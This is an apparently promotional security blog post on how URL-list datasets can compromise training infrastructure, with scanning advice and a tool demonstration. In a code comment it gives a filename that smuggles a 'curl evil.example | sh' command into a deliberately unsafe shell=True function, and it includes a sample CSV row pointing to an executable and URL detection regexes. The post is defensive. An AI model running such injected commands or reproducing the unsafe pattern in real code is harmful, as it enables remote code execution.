Data Poisoning via Malicious URLs: The Danger in Your CSV

The "Passive" Threat

When we talk about Data Poisoning, we usually mean injecting bad data to ruin a model's accuracy. But there is a more immediate threat: Infrastructure Compromise.

Modern datasets (CommonCrawl, LAION, or custom scrapes) contain millions of URLs. Data loaders (like webdataset or custom scripts) iterate through these rows and download the content using curl, wget, or Python's requests.
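
In practice, that loop is often just a few lines of Python. A minimal sketch of the pattern (the file name and column names are illustrative):

import csv
import os

import requests

os.makedirs("data", exist_ok=True)

# Iterate over a URL-list dataset and fetch every sample.
# Whatever the remote server returns ends up on your disk, byte for byte.
with open("dataset.csv", newline="") as f:
    for row in csv.DictReader(f):
        resp = requests.get(row["source_url"], timeout=10)
        with open(os.path.join("data", f"{row['id']}.bin"), "wb") as out:
            out.write(resp.content)  # contents are fully attacker-controlled

Every byte written here came from a server you don't control.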

The Attack Vector

An attacker doesn't need to hack the dataset host. They just need to:

  1. Buy an expired domain that is referenced in a popular dataset.
  2. Host a malicious file there (e.g., a file named image.jpg that is actually a shell script, or a direct .exe).
  3. Wait for your training script to download and process it.

If your data processing pipeline has vulnerabilities (such as shell=True in subprocess calls, or an unpatched image decoder like the libwebp build hit by CVE-2023-4863), merely processing the downloaded file can trigger an exploit.
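
For instance, a pipeline that shells out to inspect downloads is one crafted filename away from arbitrary code execution. A deliberately unsafe sketch alongside the fix (the function names are hypothetical):

import subprocess

# UNSAFE: the path is interpolated into a shell command line.
# A file saved as "cat.jpg; curl evil.example | sh" runs the attacker's code.
def identify_unsafe(path: str) -> str:
    return subprocess.run(f"file {path}", shell=True,
                          capture_output=True, text=True).stdout

# SAFER: pass arguments as a list so no shell ever parses the filename.
def identify_safe(path: str) -> str:
    return subprocess.run(["file", "--", path],
                          capture_output=True, text=True).stdout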

In simpler attacks, we've seen CSV files injected with direct links to executables:

id,description,source_url
102,"Cute cat image","http://malicious-site.com/update.exe"

If a developer blindly clicks links to verify the data, or if a script shells out to "read" the file type, the machine can be compromised.
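
One cheap defense is to compare a file's claimed extension against its magic bytes before doing anything else with it. A minimal sketch (the signature table covers only the payload types mentioned above):

# Well-known magic bytes for the payload types discussed in this post.
SIGNATURES = {
    b"MZ": "windows executable",   # PE/.exe header
    b"#!": "script",               # shebang line
    b"\xff\xd8\xff": "jpeg",
}

def sniff(path: str) -> str:
    with open(path, "rb") as f:
        head = f.read(8)
    for magic, kind in SIGNATURES.items():
        if head.startswith(magic):
            return kind
    return "unknown"

# A file named image.jpg that sniffs as "windows executable" or "script"
# should be quarantined, never opened.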

Scanning Terabytes of Data

You cannot manually check 10 million rows. You need automated scanning.

Veritensor implements a Streaming Engine specifically for this. It reads Parquet, CSV, and JSONL files chunk-by-chunk (without loading the whole file into RAM) and scans text columns for high-risk URL patterns.

It looks for:

  • URLs ending in executable extensions (.exe, .sh, .bat, .ps1).
  • IP-based URLs (often used for C2 servers).
  • Known phishing domains.

# Scan a 50GB Parquet file with low memory usage
veritensor scan ./big_data.parquet --full-scan
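
A rough approximation of that streaming scan in plain Python, using pandas' chunked CSV reader and regexes for the first two patterns above (illustrative only, not Veritensor's actual engine; Parquet would stream similarly via pyarrow record batches):

import re

import pandas as pd

# Heuristics: URLs ending in executable extensions, and raw-IP hosts.
EXEC_URL = re.compile(r"https?://\S+\.(?:exe|sh|bat|ps1)\b", re.IGNORECASE)
IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")

def scan_csv(path: str, chunksize: int = 100_000):
    """Stream a large CSV and yield (row, column, url) for risky matches."""
    for chunk in pd.read_csv(path, chunksize=chunksize, dtype=str):
        for col in chunk.columns:
            for idx, value in chunk[col].dropna().items():
                for pattern in (EXEC_URL, IP_URL):
                    hit = pattern.search(value)
                    if hit:
                        yield idx, col, hit.group(0)

for row, col, url in scan_csv("big_data.csv"):
    print(f"high-risk URL at row {row}, column {col}: {url}")

Because each chunk is dropped before the next is read, memory stays flat no matter how large the file grows.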

Clean data isn't just about model performance; it's about keeping your training cluster safe.